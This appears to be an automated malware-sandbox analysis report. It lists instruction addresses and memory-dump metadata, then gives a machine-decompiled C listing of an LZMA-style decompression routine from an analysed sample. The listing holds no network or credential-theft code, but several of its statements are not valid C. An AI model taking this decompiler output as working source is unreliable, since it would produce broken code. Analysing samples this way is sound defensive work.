                        0x0040630e
                        0x004062da
                        0x004062da
                        0x004062de
                        0x004062e6
                        0x004062eb
                        0x004062ed
                        0x004062ef
                        0x004062ef
                        0x00406311
                        0x00406318
                        0x0040631b
                        0x00000000
                        0x00406321
                        0x00000000
                        0x00406321
                        0x00000000
                        0x00406326
                        0x00406326
                        0x0040632a
                        0x004069ea
                        0x00000000
                        0x004069ea
                        0x00406330
                        0x00406333
                        0x00406336
                        0x0040633a
                        0x0040633d
                        0x00406343
                        0x00406345
                        0x00406345
                        0x00406345
                        0x00406348
                        0x0040634b
                        0x0040634b
                        0x0040634b
                        0x00406351
                        0x00000000
                        0x00000000
                        0x00406353
                        0x00406356
                        0x00406359
                        0x0040635c
                        0x0040635f
                        0x00406362
                        0x00406365
                        0x00406368
                        0x0040636b
                        0x0040636e
                        0x00406371
                        0x00406389
                        0x0040638c
                        0x0040638f
                        0x00406392
                        0x00406392
                        0x00406395
                        0x00406399
                        0x0040639b
                        0x00406373
                        0x00406373
                        0x0040637b
                        0x00406380
                        0x00406382
                        0x00406384
                        0x00406384
                        0x0040639e
                        0x004063a5
                        0x004063a8
                        0x00000000
                        0x004063aa
                        0x00000000
                        0x004063aa
                        0x004063a8
                        0x004063af
                        0x004063af
                        0x004063af
                        0x004063af
                        0x00000000
                        0x00000000
                        0x004063ea
                        0x004063ea
                        0x004063ee
                        0x004069f6
                        0x00000000
                        0x004069f6
                        0x004063f4
                        0x004063f7
                        0x004063fa
                        0x004063fe
                        0x00406401
                        0x00406407
                        0x00406409
                        0x00406409
                        0x00406409
                        0x0040640c
                        0x0040640f
                        0x0040640f
                        0x00406415
                        0x004063b3
                        0x004063b3
                        0x004063b6
                        0x00000000
                        0x004063b6
                        0x00406417
                        0x00406417
                        0x0040641a
                        0x0040641d
                        0x00406420
                        0x00406423
                        0x00406426
                        0x00406429
                        0x0040642c
                        0x0040642f
                        0x00406432
                        0x00406435
                        0x0040644d
                        0x00406450
                        0x00406453
                        0x00406456
                        0x00406456
                        0x00406459
                        0x0040645d
                        0x0040645f
                        0x00406437
                        0x00406437
                        0x0040643f
                        0x00406444
                        0x00406446
                        0x00406448
                        0x00406448
                        0x00406462
                        0x00406469
                        0x0040646c
                        0x00000000
                        0x0040646e
                        0x00000000
                        0x0040646e
                        0x00000000
                        0x004066fb
                        0x004066fb
                        0x004066ff
                        0x00406a26
                        0x00000000
                        0x00406a26
                        0x00406705
                        0x00406708
                        0x0040670b
                        0x0040670f
                        0x00406712
                        0x00406718
                        0x0040671a
                        0x0040671a
                        0x0040671a
                        0x0040671d
                        0x00000000
                        0x00000000
                        0x004064cb
                        0x004064cb
                        0x004064ce
                        0x00000000
                        0x00000000
                        0x0040680a
                        0x0040680e
                        0x00406830
                        0x00406833
                        0x0040683d
                        0x00406840
                        0x00406840
                        0x00000000
                        0x00406840
                        0x00406810
                        0x00406813
                        0x00406817
                        0x0040681a
                        0x0040681a
                        0x0040681d
                        0x00000000
                        0x00000000
                        0x004068c7
                        0x004068cb
                        0x004068e9
                        0x004068e9
                        0x004068e9
                        0x004068f0
                        0x004068f7
                        0x004068fe
                        0x004068fe
                        0x00000000
                        0x004068fe
                        0x004068cd
                        0x004068d0
                        0x004068d3
                        0x004068d6
                        0x004068dd
                        0x00406821
                        0x00406821
                        0x00406824
                        0x00000000
                        0x00000000
                        0x004069b8
                        0x004069bb
                        0x00000000
                        0x00000000
                        0x004065f2
                        0x004065f4
                        0x004065fb
                        0x004065fc
                        0x004065fe
                        0x00406601
                        0x00000000
                        0x00000000
                        0x00406609
                        0x0040660c
                        0x0040660f
                        0x00406611
                        0x00406613
                        0x00406613
                        0x00406614
                        0x00406617
                        0x0040661e
                        0x00406621
                        0x0040662f
                        0x00000000
                        0x00000000
                        0x00406905
                        0x00406905
                        0x00406908
                        0x0040690f
                        0x00000000
                        0x00000000
                        0x00406914
                        0x00406914
                        0x00406918
                        0x00406a50
                        0x00000000
                        0x00406a50
                        0x0040691e
                        0x00406921
                        0x00406924
                        0x00406928
                        0x0040692b
                        0x00406931
                        0x00406933
                        0x00406933
                        0x00406933
                        0x00406936
                        0x00406939
                        0x00406939
                        0x00406939
                        0x00406939
                        0x0040693c
                        0x0040693c
                        0x00406940
                        0x004069a0
                        0x004069a3
                        0x004069a8
                        0x004069a9
                        0x004069ab
                        0x004069ad
                        0x004069b0
                        0x004068bc
                        0x004068bc
                        0x00000000
                        0x004068bc
                        0x00406942
                        0x00406948
                        0x0040694b
                        0x0040694e
                        0x00406951
                        0x00406954
                        0x00406957
                        0x0040695a
                        0x0040695d
                        0x00406960
                        0x00406963
                        0x0040697c
                        0x0040697f
                        0x00406982
                        0x00406985
                        0x00406989
                        0x0040698b
                        0x0040698b
                        0x0040698c
                        0x0040698f
                        0x00406965
                        0x00406965
                        0x0040696d
                        0x00406972
                        0x00406974
                        0x00406977
                        0x00406977
                        0x00406992
                        0x00406999
                        0x00000000
                        0x0040699b
                        0x00000000
                        0x0040699b
                        0x00000000
                        0x00406637
                        0x0040663a
                        0x00406670
                        0x004067a0
                        0x004067a0
                        0x004067a0
                        0x004067a0
                        0x004067a3
                        0x004067a3
                        0x004067a6
                        0x004067a8
                        0x00406a32
                        0x00000000
                        0x00406a32
                        0x004067ae
                        0x004067b1
                        0x00000000
                        0x00000000
                        0x004067b7
                        0x004067bb
                        0x004067be
                        0x004067be
                        0x004067be
                        0x00000000
                        0x004067be
                        0x0040663c
                        0x0040663e
                        0x00406640
                        0x00406642
                        0x00406645
                        0x00406646
                        0x00406648
                        0x0040664a
                        0x0040664d
                        0x00406650
                        0x00406666
                        0x0040666b
                        0x004066a3
                        0x004066a3
                        0x004066a7
                        0x004066d3
                        0x004066d5
                        0x004066dc
                        0x004066df
                        0x004066e2
                        0x004066e2
                        0x004066e7
                        0x004066e7
                        0x004066e9
                        0x004066ec
                        0x004066f3
                        0x004066f6
                        0x00406723
                        0x00406723
                        0x00406726
                        0x00406729
                        0x0040679d
                        0x0040679d
                        0x0040679d
                        0x00000000
                        0x0040679d
                        0x0040672b
                        0x00406731
                        0x00406734
                        0x00406737
                        0x0040673a
                        0x0040673d
                        0x00406740
                        0x00406743
                        0x00406746
                        0x00406749
                        0x0040674c
                        0x00406765
                        0x00406767
                        0x0040676a
                        0x0040676b
                        0x0040676e
                        0x00406770
                        0x00406773
                        0x00406775
                        0x00406777
                        0x0040677a
                        0x0040677c
                        0x0040677f
                        0x00406783
                        0x00406785
                        0x00406785
                        0x00406786
                        0x00406789
                        0x0040678c
                        0x0040674e
                        0x0040674e
                        0x00406756
                        0x0040675b
                        0x0040675d
                        0x00406760
                        0x00406760
                        0x0040678f
                        0x00406796
                        0x00406720
                        0x00406720
                        0x00406720
                        0x00406720
                        0x00000000
                        0x00406798
                        0x00000000
                        0x00406798
                        0x00406796
                        0x004066a9
                        0x004066ac
                        0x004066ae
                        0x004066b1
                        0x004066b4
                        0x004066b7
                        0x004066b9
                        0x004066bc
                        0x004066bf
                        0x004066bf
                        0x004066c2
                        0x004066c2
                        0x004066c5
                        0x004066cc
                        0x004066a0
                        0x004066a0
                        0x004066a0
                        0x004066a0
                        0x00000000
                        0x004066ce
                        0x00000000
                        0x004066ce
                        0x004066cc
                        0x00406652
                        0x00406655
                        0x00406657
                        0x0040665a
                        0x00000000
                        0x00000000
                        0x004063b9
                        0x004063b9
                        0x004063bd
                        0x00406a02
                        0x00000000
                        0x00406a02
                        0x004063c3
                        0x004063c6
                        0x004063c9
                        0x004063cc
                        0x004063cf
                        0x004063d2
                        0x004063d5
                        0x004063d7
                        0x004063da
                        0x004063dd
                        0x004063e0
                        0x004063e2
                        0x004063e2
                        0x004063e2
                        0x00000000
                        0x00000000
                        0x00406544
                        0x00406544
                        0x00406548
                        0x00406a0e
                        0x00000000
                        0x00406a0e
                        0x0040654e
                        0x00406551
                        0x00406554
                        0x00406557
                        0x00406559
                        0x00406559
                        0x00406559
                        0x0040655c
                        0x0040655f
                        0x00406562
                        0x00406565
                        0x00406568
                        0x0040656b
                        0x0040656c
                        0x0040656e
                        0x0040656e
                        0x0040656e
                        0x00406571
                        0x00406574
                        0x00406577
                        0x0040657a
                        0x0040657a
                        0x0040657a
                        0x0040657d
                        0x0040657f
                        0x0040657f
                        0x00000000
                        0x00000000
                        0x004067c1
                        0x004067c1
                        0x004067c1
                        0x004067c5
                        0x00000000
                        0x00000000
                        0x004067cb
                        0x004067ce
                        0x004067d1
                        0x004067d4
                        0x004067d6
                        0x004067d6
                        0x004067d6
                        0x004067d9
                        0x004067dc
                        0x004067df
                        0x004067e2
                        0x004067e5
                        0x004067e8
                        0x004067e9
                        0x004067eb
                        0x004067eb
                        0x004067eb
                        0x004067ee
                        0x004067f1
                        0x004067f4
                        0x004067f7
                        0x004067fa
                        0x004067fe
                        0x00406800
                        0x00406803
                        0x00000000
                        0x00406805
                        0x00406582
                        0x00406582
                        0x00000000
                        0x00406582
                        0x00406803
                        0x00406a38
                        0x00406a5a
                        0x00406a60
                        0x00406a62
                        0x00406a69
                        0x00000000
                        0x00000000
                        0x00406067
                        0x00406a6f
                        0x00406a6f
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                        • Instruction ID: b8f14fa8ad5cea51b2b9a2e46606c418b7244df3771cf842608f3b99def8c173
                        • Opcode Fuzzy Hash: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                        • Instruction Fuzzy Hash: A3818731E00228CFDF24DFA8C8447ADBBB1FB45305F21816AD956BB281C7785A96DF44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00406473, Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                        Download Yara Rule
                        C-Code - Quality: 98%
                        			E00406473() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00406A77))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4)); // executed
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8)); // executed
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
